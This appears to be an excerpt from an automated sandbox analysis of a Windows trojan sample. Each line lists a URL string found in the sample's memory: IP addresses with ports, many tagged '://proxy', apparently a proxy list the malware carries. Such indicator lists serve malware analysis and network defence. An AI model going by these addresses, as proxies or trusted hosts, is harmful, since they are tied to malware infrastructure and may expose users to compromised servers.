                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.85.184:54347://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.87.148:16744
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.87.148:16744://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.87.148:40591
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.87.148:40591://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.87.148:42801
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.87.148:42801://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A72000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.88.163:1992
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.88.163:1992://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.88.163:51350
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.88.163:51350://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.88.163:54445
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.88.163:54445://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.114.107.37
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.114.107.37://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.114.107.37:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.100.244:11562
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.100.244:11562://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:37355
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:37355://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:39452
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:39452://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:39533
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:39533://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:408250
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:40825://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:41491
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA7FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:41491://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:46249
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:46249://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.158.55:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.158.55:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.159.43:13988
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.159.43:13988://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.159.43:32988
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.159.43:32988://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95C8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.159.43:48983
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.159.43:48983://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.159.43:60153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.159.43:60153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.42.153:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.42.153:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.91.47:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.91.47:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.235.185.47:6969
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.235.185.47:6969://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.214:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.214:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.218:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.218:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.220:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.220:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.250.181.133:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC8A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.250.181.133:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.208.252:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.208.252:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.220.29:7497
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.220.29:7497://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.5.83:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.5.83:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.5.83:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.5.83:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:32947
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:32947://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:33912
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:33912://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:35196
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:35196://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:37172
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:37172://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:46411
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:46411://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:46859
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:46859://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:49369
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:49369://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.76.187:7497
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.76.187:7497://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:1546
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:1546://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:27237
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:27237://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:34913
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:34913://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:48953
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:48953://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:50450
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:50450://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:57581
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:57581://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:59431://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:59431xD
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:60880
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.123.158:60880://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.124.118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.124.118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.124.118:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.131.11
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.131.11://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.131.11:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.174.59
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC6CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.174.59://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC6CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.174.59:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.182.227:39031
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.182.227:39031://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F56000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.219.173:8118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.219.173:8118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.233.164:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.233.164:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA900000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.36.48:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.36.48:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.39.82:13486
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.39.82:13486://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.39.82:28140
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.39.82:28140://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.39.82:46015
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.39.82:46015://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.39.82:46523
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.39.82:46523://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA533000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.76.245:22038
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA54C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.76.245:22038://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.138.21.250:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.138.21.250:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.138.211.5:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.138.211.5:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.181.196.76:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.181.196.76:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78E8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.194.75.98:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.194.75.98:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.195.203.106:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.195.203.106:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82AA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.205.102.26:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.205.102.26:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.227.150.10:8081
